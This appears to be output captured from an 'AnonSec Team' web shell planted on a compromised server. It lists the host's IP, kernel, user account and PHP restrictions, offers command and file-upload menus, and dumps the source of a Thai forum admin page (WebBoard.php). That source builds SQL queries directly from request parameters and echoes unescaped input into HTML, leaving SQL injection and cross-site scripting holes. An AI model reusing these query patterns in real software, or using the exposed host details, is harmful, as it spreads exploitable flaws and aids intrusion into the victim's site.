AnonSec Team

Server IP : 124.109.2.77 / Your IP : 216.73.216.49
Web Server : Apache/2
System : Linux ns4.amiprocorp.com 3.10.0-1160.76.1.el7.x86_64 #1 SMP Wed Aug 10 16:21:17 UTC 2022 x86_64
User : cpctlp ( 1020)
PHP Version : 5.6.40
Disable Function : exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname
MySQL : ON | cURL : ON | WGET :
Warning: file_exists(): open_basedir restriction in effect. File(/usr/bin/wget) is not within the allowed path(s): (/home/cpctlp/:/tmp/:/var/tmp/:/opt/alt/php83/usr/share/pear/:/dev/urandom:/usr/local/php56/lib/:/usr/local/php83/lib/:/usr/local/php74/lib/:/usr/local/php56/lib/:/usr/local/lib/php/) in /home/cpctlp/domains/cpctlphp.com/public_html/admin/images/News/202602260302550.php on line 329
OFF | Perl :
Warning: file_exists(): open_basedir restriction in effect. File(/usr/bin/perl) is not within the allowed path(s): (/home/cpctlp/:/tmp/:/var/tmp/:/opt/alt/php83/usr/share/pear/:/dev/urandom:/usr/local/php56/lib/:/usr/local/php83/lib/:/usr/local/php74/lib/:/usr/local/php56/lib/:/usr/local/lib/php/) in /home/cpctlp/domains/cpctlphp.com/public_html/admin/images/News/202602260302550.php on line 335
OFF | Python :
Warning: file_exists(): open_basedir restriction in effect. File(/usr/bin/python2) is not within the allowed path(s): (/home/cpctlp/:/tmp/:/var/tmp/:/opt/alt/php83/usr/share/pear/:/dev/urandom:/usr/local/php56/lib/:/usr/local/php83/lib/:/usr/local/php74/lib/:/usr/local/php56/lib/:/usr/local/lib/php/) in /home/cpctlp/domains/cpctlphp.com/public_html/admin/images/News/202602260302550.php on line 341
OFF
Directory (0755) : /home/cpctlp/domains/cpctlphp.com/public_html/admin/src/../js/../
[ Home ]	[ C0mmand ]	[ Upload File ]
Current File : /home/cpctlp/domains/cpctlphp.com/public_html/admin/src/../js/../WebBoard.php
<?php 
session_start();
header('Content-Type: text/plain; charset=utf-8');
header('Content-Type: text/html; charset=utf-8');
//กำหนดให้ IE อ่าน page นี้ทุกครั้ง ไม่ไปเอาจาก cache
header ("Expires: Mon, 26 Jul 1997 05:00:00 GMT");
header ("Last-Modified: " . gmdate("D, d M Y H:i:s") . " GMT");
header ("Cache-Control: no-cache, must-revalidate");
header ("Pragma: no-cache");
include ("Connections/config.php");
if($_SESSION[UserRight]!="A"){
	echo "<BR><BR><META HTTP-EQUIV=\"REFRESH\" CONTENT=\"1; URL=index.php\">";
	exit;
}
?>
<!DOCTYPE html>
<html lang="en">
  <head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <!-- Meta, title, CSS, favicons, etc. -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">

  <title><?php  echo $config[web_title];?></title>
     <?php  include("header-css.php");?>
		<!-- Ckeditor -->
		<script src="ckeditor4.10.1/ckeditor.js"></script>
 		<!-- Ckeditor -->
 
  </head>
<?php 
  include ("Connections/function-sys.php");
 $page_data=72;
$sql="select  page_name.* from page_name 	where page_data='$page_data'   ";
$arr=$db->getRec($sql);		
$page_name=$arr[page_name];
$page_data="$arr[page_data]";
?>
   <body class="nav-md">
    <div class="container body">
      <div class="main_container">
		
		 <!-- Left side column. contains the logo and sidebar -->
		  <?php  include("left-menu.php");?>
		 <!-- Left side column. contains the logo and sidebar -->

         <!-- Header -->
			<?php  include("header.php");?>
		 <!-- Header -->

        <!-- page content -->
        <div class="right_col" role="main">
          <div class="">
			<!-- Start -->

            <div class="clearfix"></div><!-- เส้น -->

            <div class="row">
              <div class="col-md-12 col-sm-12 col-xs-12">
                <div class="x_panel">

					<div class="x_title">
                     <h2> <?php  echo $page_name;?> </h2>
                    <div class="clearfix"></div>
                  </div>

                   <div class="x_content">
				    <!-- เริ่มต้น -->
					<?php 
 						switch($_REQUEST[action]){
							case "Insert2DB":
											if(isset($_POST['submit']))	{//ตรวจสอบว่ามีการคลิ๊กปุ่ม submit หรือเปล่า	
												$sql ="select  *  from board where aTitle='$_REQUEST[aTitle]'  and aFrom='$_REQUEST[aFrom]' ";
												$row=$db->recCount($sql);
												if($row!=0){
													$msg="ข้อมูลนี้มีแล้ว!";
												}else
											   {				
													if(!empty($_FILES[aFile][name])){	
														$qExt="jpg,png,gif,pjpeg,ppt,pptx,pdf,doc,docx,xls,xlsx";
														$size=0;
														$filename=date("YmdHis")."1";
														$filename=upload_resizeIMG("aFile","images/board",$filename,$qExt,$size);//ถ้ากำหนด size เป็น 0 หรือช่องว่าง จะไม่ resize  resize เฉพาะรูปภาพ
													}

													if(!empty($_REQUEST[aUrl])){
														$aUrl=$_REQUEST[aUrl];
												   }
												$uniqid = $rand = substr(str_shuffle('ABCDEFGHIJKLMNOPQRSTUVWXYZ23456789'),0,5);//str_shuffle สับเปลี่ยนตัวอักษรในสตริง ด้วยฟังก์ชัน str_shuffle()
												$sql="insert into board (aFrom,aEmail,aTel,aTitle,aDesc,aUrl,aFile,uniqid,empID,statusID,lastupdate,aDate,page_data) 	values 
															('$_REQUEST[aFrom]','$_REQUEST[aEmail]','$_REQUEST[aTel]','$_REQUEST[aTitle]','$_REQUEST[aDesc]','$aUrl','$filename','$uniqid'
															,'$_SESSION[User_id]','1',now(),now(),'$page_data')";
													$db->query($sql);
													$msg="บันทึกข้อมูลเรียบร้อยแล้ว!";
												}
											}//ปิด submit
											echo <<<DOC
											 <CENTER><IMG SRC="images/icons/loading2.gif" WIDTH="100" BORDER="0" ></CENTER>
											 <script>    
												SweetAlert('$msg','$_SERVER[PHP_SELF]')
											</script>
DOC;
															break;

							default :
										if(empty($_REQUEST[page])){
											$page=1;
										}else
										{
											$page=$_REQUEST[page];
										}
										
										if(!empty($_REQUEST[TxTSeach])){
 											$Where=" and (board.aTitle like '%$_REQUEST[TxTSeach]%' or board.aFrom like '%$_REQUEST[TxTSeach]%' ) ";
										}
 
										echo <<<DOC
												<CENTER>
												<div style="width:99%">
													<form method="post" id="s" action="$_SERVER[PHP_SELF]">
																<TABLE style="width:99%">
																<TR>
																	<TD  width="15%"><A HREF="$_SERVER[PHP_SELF]?action=AddForm">
																	<button type="button" class="btn btn-success btn-sm pull-left"><span class="glyphicon glyphicon-plus-sign"></span> <strong>ตั้งกระทู้</strong></button></A></TD>
																	<TD  width="20%" align="right"><input type="text" class="form-control" name="TxTSeach" placeholder="หัวเรื่อง" value="" style="width:80%;"></TD>
 																	<TD  width="1%">&nbsp;</TD>
																	<TD  width="3%"><button type="submit" class="btn btn-success btn-sm"><i class="glyphicon glyphicon-search"></i></button></TD>
																</TR>
																</TABLE>
 																</form>
													<div   class="col-sm-12">
															
													</div><BR><BR>
													
													<table class="table table-hover" >
													<thead>
														<tr  class="warning" style="text-align: center">
														<th width=5% style="text-align: center">ลำดับ</th>
 														<th style="text-align: left">รายการ</th>
														<th style="text-align: left" class="col-lg-3">ผู้ส่ง</th>
  														<th  width=5% style="text-align: center">แก้ไข</th>
														<th  width=5%  style="text-align: center">ลบ</th>
														</tr>
													  </thead>
													  <tbody id="myTable">
DOC;
 
										
										$sql ="select  *  from board where page_data='$page_data' $Where order by aDate desc ";
										$row=$db->recCount($sql);
										if($row!=0){
												foreach ($db->dbSearch($sql) as $i=>$arr) {	
													$j=1+$i;
 													$arr[aDate]=ShowAllDate($arr[aDate],4)." ".substr($arr[aDate],10,10);
   													echo <<<DOC
													<tr>
														<td style="text-align: center" width=5%>$j</td>
														 <td><A HREF="../ShowWebBoard.php?id=$arr[uniqid]$arr[aID]" target="new$arr[aID]">$arr[aTitle]</A> <BR><span class="pull-left"style="color:#999999;font-size: 10px;">เผยแพร่:$arr[aDate]</span></td>
														<td>$arr[aFrom]</td>
														<td style="text-align: center" width=1%><A HREF="$_SERVER[PHP_SELF]?action=AddForm&aID=$arr[aID]">
																	<button type="button" class="btn btn-success btn-xs" style="width:25px;height: 25px;"><span class="glyphicon glyphicon-pencil"></span></button></A></td>
															<td style="text-align: center" width=1%>
																<A HREF="#" onClick="sebSweetConfirm('$_SERVER[PHP_SELF]?action=del4Data&aID=$arr[aID]');">
																		<button type="button" class="btn btn-danger btn-xs" style="width:25px;height: 25px;"><span class="glyphicon glyphicon-trash"></span></button></A>
															</td>
													</tr>
DOC;
												}
										}else
										{								
											echo <<<DOC
												<tr>
													<td colspan=13><BR><div align=center><strong>ไม่พบข้อมูล!</strong></div><BR></td>
												</tr>
DOC;
										}
											echo "</tbody>
											</table>
										</div>
										</CENTER>";
										
										break;

							case "del4Data":
										$sql="delete from board  where aID='$_REQUEST[aID]' ";
										$db->query($sql);
										$msg="ลบข้อมูลเรียบร้อยแล้ว!";
										echo <<<DOC
										 <CENTER><IMG SRC="images/icons/loading2.gif" WIDTH="100" BORDER="0" ></CENTER>
										 <script>    
											 SweetAlert('$msg','$_SERVER[PHP_SELF]')
										</script>
DOC;
										break;	
										
							case "Update2DB":
									if(isset($_POST['submit']))	{//ตรวจสอบว่ามีการคลิ๊กปุ่ม submit หรือเปล่า	
											$sql ="select  *  from board where aTitle='$_REQUEST[aTitle]'  and aID !='$_REQUEST[aID]'  and aFrom='$_REQUEST[aFrom]' ";
											$row=$db->recCount($sql);
											if($row!=0){
												$msg="ข้อมูลนี้มีแล้ว!";
											}else
										   {		
												if(!empty($_FILES[aFile][name])){	
													$qExt="jpg,png,gif,pjpeg,ppt,pptx,pdf,doc,docx,xls,xlsx";
													$size=0;
													$filename=date("YmdHis")."1";
													$filename=upload_resizeIMG("aFile","images/board",$filename,$qExt,$size);//ถ้ากำหนด size เป็น 0 หรือช่องว่าง จะไม่ resize  resize เฉพาะรูปภาพ
												}else
											   {
													$filename=$_REQUEST[aFile2];
											   }

												if(!empty($_REQUEST[aUrl])){
													$aUrl=$_REQUEST[aUrl];
											   }
												$today =date("Y-m-d H:i:s"); 
												  $sql="update board set aFrom='$_REQUEST[aFrom]',aEmail='$_REQUEST[aEmail]',aTel='$_REQUEST[aTel]',
														aTitle='$_REQUEST[aTitle]',aDesc='$_REQUEST[aDesc]',aUrl='$aUrl',aFile='$filename'
														,empID='$_SESSION[User_id]',lastupdate=now() 
														where aID='$_REQUEST[aID]'";	
												$db->query($sql);
												$msg="บันทึกข้อมูลเรียบร้อยแล้ว!";
											}
									}//ปิด submit
									echo <<<DOC
									 <CENTER><IMG SRC="images/icons/loading2.gif" WIDTH="100" BORDER="0" ></CENTER>
									 <script>    
									  SweetAlert('$msg','$_SERVER[PHP_SELF]')
									</script>
DOC;
									break;

						  case "AddForm":
							if(empty($_REQUEST[aID])){
								$action="Insert2DB";
							}else
							{
								$action="Update2DB";
								$sql="select  board.* from board 	where aID='$_REQUEST[aID]' ";
								$arrE=$db->getRec($sql);		
							}
  						?>
 

						<form id="boardForm" method="post" action="<?php echo $_SERVER[PHP_SELF];?>" class="form-horizontal" enctype="multipart/form-data"  >
						<div class="col-lg-12">
								
								<div class="form-group">
									<label class="col-lg-2 control-label">ประเด็น</label>
									<div class="col-lg-8">
										<input type="text" class="form-control" name="aTitle" placeholder="หัวเรื่อง"  value="<?php echo $arrE[aTitle];?>" required/>
									</div>
								</div>
								<div class="form-group">
								<label class="col-lg-2 control-label">รายละเอียด</label>
								<div class="col-lg-10">
									 <textarea  id="aDesc" class="ckeditor" name="aDesc" rows="7" cols="100"><?php  echo $arrE[aDesc];?></textarea> 
								</div>
							</div>
								<div class="form-group">
									<label class="col-lg-2 control-label">ลิงค์</label>
									<div class="col-lg-8">
										<input type="text" class="form-control" name="aUrl" placeholder="เว็บลิงค์"  value="<?php echo $arrE[aUrl];?>" autocomplete="off" />
									</div>
								</div>

								<div class="form-group">
									<label class="col-lg-2 control-label">ไฟล์เอกสาร</label>
									<div class="col-lg-8">
										<a class='btn btn-primary' href='javascript:;'>เลือกไฟล์
										<input type="file" style='position:absolute;z-index:2;top:0;left:0;filter: alpha(opacity=0);-ms-filter:"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";opacity:0;background-color:transparent;color:transparent;' name="aFile" size="40"  onchange='$("#upload-file-info").html($(this).val());'>
									</a>
									&nbsp;
									<span class='label label-info' id="upload-file-info"></span>
									</div>
								</div>
								
								<div class="form-group">
									<label class="col-lg-2 control-label">ผู้ส่ง</label>
									<div class="col-lg-5">
										<input type="text" class="form-control" name="aFrom" placeholder="ผู้ส่ง(ชื่อ-สกุล)"  value="<?php echo $arrE[aFrom];?>" required/>
									</div>
								</div>
								<div class="form-group">
									<label class="col-lg-2 control-label">เบอร์โทร</label>
									<div class="col-lg-5">
										<input type="text" class="form-control" name="aTel" placeholder="เบอร์โทร"  value="<?php echo $arrE[aTel];?>"/>
									</div>
								</div>
								<div class="form-group">
									<label class="col-lg-2 control-label">E-mail</label>
									<div class="col-lg-5">
										<input type="text" class="form-control" name="aEmail" placeholder="E-mail"  value="<?php echo $arrE[aEmail];?>"/>
									</div>
								</div>

								<div class="form-group">
								<div class="col-lg-11 col-lg-offset-2">

									<button type="submit" name="submit"   class="btn btn-primary">บันทึก</button>
									<button type="button" class="btn btn-primary" onclick="self.location.href='<?php  echo "$_SERVER[PHP_SELF]";?>' ">ยกเลิก</button>
									<INPUT TYPE="hidden" NAME="action" value="<?php echo $action;?>">
									<INPUT TYPE="hidden" NAME="aID" value="<?php echo $_REQUEST[aID];?>">
									<INPUT TYPE="hidden" NAME="aFile2"   value="<?php echo $arrE[aFile];?>"> 
								</div>
							</div>

						</div>
						<!-- <div class="col-lg-10">-->
					</form>
				<?php 
					break;
					
					case "UpdateAns2DB":
									if(isset($_POST['submit']))	{//ตรวจสอบว่ามีการคลิ๊กปุ่ม submit หรือเปล่า	
										if(!empty($_FILES[ansFile][name])){	
											$qExt="jpg,png,gif,pjpeg,ppt,pptx,pdf,doc,docx,xls,xlsx";
											$size=0;
											$filename=date("YmdHis")."1";
											$filename=upload_resizeIMG("ansFile","images/board",$filename,$qExt,$size);//ถ้ากำหนด size เป็น 0 หรือช่องว่าง จะไม่ resize  resize เฉพาะรูปภาพ
										}else
									   {
											$filename=$_REQUEST[ansFile2];
									   }

										if(!empty($_REQUEST[ansUrl])){
											$ansUrl=$_REQUEST[ansUrl];
									   }
 									   $sql="update board set ansDate=now(),ansFrom='$_REQUEST[ansFrom]',ansEmail='$_REQUEST[ansEmail]',ansTel='$_REQUEST[ansTel]'
												,ansDesc='$_REQUEST[ansDesc]',ansUrl='$ansUrl',ansFile='$filename',empID='$_SESSION[User_id]',lastupdate=now() 
												where aID='$_REQUEST[aID]'";	
									   $db->query($sql);
										$msg="บันทึกข้อมูลเรียบร้อยแล้ว!";
 
								}//ปิดบันทึก
								echo <<<DOC
								 <CENTER><IMG SRC="images/icons/loading2.gif" WIDTH="100" BORDER="0" ></CENTER>
								 <script>    
								  SweetAlert('$msg','$_SERVER[PHP_SELF]')
								</script>
DOC;
									break;

					 case "AnsForm":
							if(!empty($_REQUEST[aID])){
								$action="UpdateAns2DB";
  								$sql="select  board.* from board 	where aID='$_REQUEST[aID]' ";
								$arrE=$db->getRec($sql);		
   						?>
 

						<form id="boardForm" method="post" action="<?php echo $_SERVER[PHP_SELF];?>" class="form-horizontal" enctype="multipart/form-data"  >
						<div class="col-lg-12">
								
							<div class="form-group">
								<label class="col-lg-2" align="right">ประเด็น</label>
								<div class="col-lg-8"><?php echo $arrE[aTitle];?></div>
							</div>
							<div class="form-group">
								<label class="col-lg-2" align="right">รายละเอียด</label>
 								<div class="col-lg-8"><?php echo $arrE[aDesc];?></div>
							</div>
							<div class="form-group">
								<label class="col-lg-2" align="right">จาก</label>
 								<div class="col-lg-8"><?php echo $arrE[aFrom];?></div>
							</div>
							<div class="form-group">
								<label class="col-lg-2" align="right">เบอร์โทร</label>
 								<div class="col-lg-8"><?php echo $arrE[aTel];?></div>
							</div>
							<div class="form-group">
								<label class="col-lg-2" align="right">E-mail</label>
 								<div class="col-lg-8"><?php echo $arrE[aEmail];?></div>
							</div>
							<div class="form-group">
								<label class="col-lg-2 control-label">คำตอบ</label>
								<div class="col-lg-10">
									 <textarea  id="ansDesc" class="ckeditor" name="ansDesc" rows="7" cols="100"><?php  echo $arrE[ansDesc];?></textarea> 
								</div>
							</div>
								<div class="form-group">
									<label class="col-lg-2 control-label">ลิงค์</label>
									<div class="col-lg-8">
										<input type="text" class="form-control" name="ansUrl" placeholder="เว็บลิงค์"  value="<?php echo $arrE[ansUrl];?>" autocomplete="off" />
									</div>
								</div>

								<div class="form-group">
									<label class="col-lg-2 control-label">ไฟล์เอกสาร</label>
									<div class="col-lg-8">
										<a class='btn btn-primary' href='javascript:;'>เลือกไฟล์
										<input type="file" style='position:absolute;z-index:2;top:0;left:0;filter: alpha(opacity=0);-ms-filter:"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";opacity:0;background-color:transparent;color:transparent;' name="ansFile" size="40"  onchange='$("#upload-file-info").html($(this).val());'>
									</a>
									&nbsp;
									<span class='label label-info' id="upload-file-info"></span>
									</div>
								</div>
								
								<div class="form-group">
									<label class="col-lg-2 control-label">ผู้ส่ง</label>
									<div class="col-lg-5">
										<input type="text" class="form-control" name="ansFrom" placeholder="ผู้ส่ง(ชื่อ-สกุล)"  value="<?php echo $_SESSION[User_name];?>" required/>
									</div>
								</div>
								<div class="form-group">
									<label class="col-lg-2 control-label">เบอร์โทร</label>
									<div class="col-lg-5">
										<input type="text" class="form-control" name="ansFrom" placeholder="เบอร์โทร"  value="<?php echo $_SESSION[User_tel];?>"/>
									</div>
								</div>
								<div class="form-group">
									<label class="col-lg-2 control-label">E-mail</label>
									<div class="col-lg-5">
										<input type="text" class="form-control" name="ansFrom" placeholder="E-mail"  value="<?php echo $_SESSION[User_email];?>"/>
									</div>
								</div>

								<div class="form-group">
								<div class="col-lg-11 col-lg-offset-2">

									<button type="submit" name="submit"   class="btn btn-primary">บันทึก</button>
									<button type="button" class="btn btn-primary" onclick="self.location.href='<?php  echo "$_SERVER[PHP_SELF]";?>' ">ยกเลิก</button>
									<INPUT TYPE="hidden" NAME="action" value="<?php echo $action;?>">
									<INPUT TYPE="hidden" NAME="aID" value="<?php echo $_REQUEST[aID];?>">
									<INPUT TYPE="hidden" NAME="ansFile2"   value="<?php echo $arrE[ansFile];?>"> 
								</div>
							</div>

						</div>
						<!-- <div class="col-lg-10">-->
					</form>
				<?php 
					 }//ปิดมี id
					break;
				}//ปิด switch?>


					<!-- สิ้นสุด -->

                  </div><!-- x_content -->
                </div><!-- x_panel -->
              </div>
            </div>

			<!-- Stop -->
          </div>
        </div>
        <!-- /page content -->

		<!-- Footer -->
		 <?php  include("footer.php");?>
		<!-- Footer -->

      </div>
    </div>

 	 <?php  include("header-script.php");?>
<script>
	 function format2(input)
    {
        var num = input.value.replace(/\,/g,'');
        if(!isNaN(num))
        {
            if(num.indexOf('.') > -1)
            {
                num = num.split('.');
                num[0] = num[0].toString().split('').reverse().join('').replace(/(?=\d*\.?)(\d{3})/g,'$1,').split('').reverse().join('').replace(/^[\,]/,'');
                if(num[1].length > 2)
                {
                    alert('กรุณาป้อนทศนิยมไม่เกินสองตำแหน่ง');
                    num[1] = num[1].substring(0,num[1].length-1);
                }
                input.value = num[0]+'.'+num[1];
            } 
            else
            { 
                input.value = num.toString().split('').reverse().join('').replace(/(?=\d*\.?)(\d{3})/g,'$1,').split('').reverse().join('').replace(/^[\,]/,'') ;
            };
        }
        else
        {
            alert('กรุณากรอกตัวเลขในช่องนี้');
            input.value = input.value.substring(0,input.value.length-1);
            
        }
    }

	function addCommas(nStr){
	   nStr = parseFloat(nStr);
	   nStr=nStr.toFixed(2);
	  nStr += '';
 	  x = nStr.split('.');
	  x1 = x[0];
	  x2 = x.length > 1 ? '.' + x[1] : '';
	  
	  var rgx = /(\d+)(\d{3})/;
	  while (rgx.test(x1)) {
	   x1 = x1.replace(rgx, '$1' + ',' + '$2');
	  }
	 
	  return x1 + x2;
}
</script>

  </body>
</html>
AnonSec - 2021